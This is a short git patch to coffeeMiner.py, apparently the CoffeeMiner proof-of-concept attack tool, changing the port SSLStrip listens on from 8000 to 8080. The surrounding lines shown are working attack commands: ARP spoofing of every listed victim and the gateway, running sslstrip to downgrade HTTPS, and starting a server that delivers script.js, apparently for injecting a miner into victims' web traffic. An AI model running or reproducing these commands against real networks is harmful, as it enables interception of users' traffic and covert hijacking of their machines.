From 0944679bbcee7481e61c3f8ec79b3c725c54ae45 Mon Sep 17 00:00:00 2001 From: Chase Taylor Date: Mon, 8 Jan 2018 20:19:01 -0700 Subject: [PATCH] Fix: changed port 8000 to 8080 for SSLStrip --- coffeeMiner.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/coffeeMiner.py b/coffeeMiner.py index 4ca2890..f47cd8a 100644 --- a/coffeeMiner.py +++ b/coffeeMiner.py @@ -40,8 +40,8 @@ for victim in victims: os.system("xterm -e arpspoof -i eth0 -t " + victim + " " + gateway + " &") os.system("xterm -e arpspoof -i eth0 -t " + gateway + " " + victim + " &") -# run SSLStrip on port 8000 -os.system("python sslstrip2/sslstrip.py -l 8000 &") +# run SSLStrip on port 8080 +os.system("python sslstrip2/sslstrip.py -l 8080 &") # start the http server for serving the script.js, in a new console os.system("xterm -hold -e 'python3 httpServer.py' &")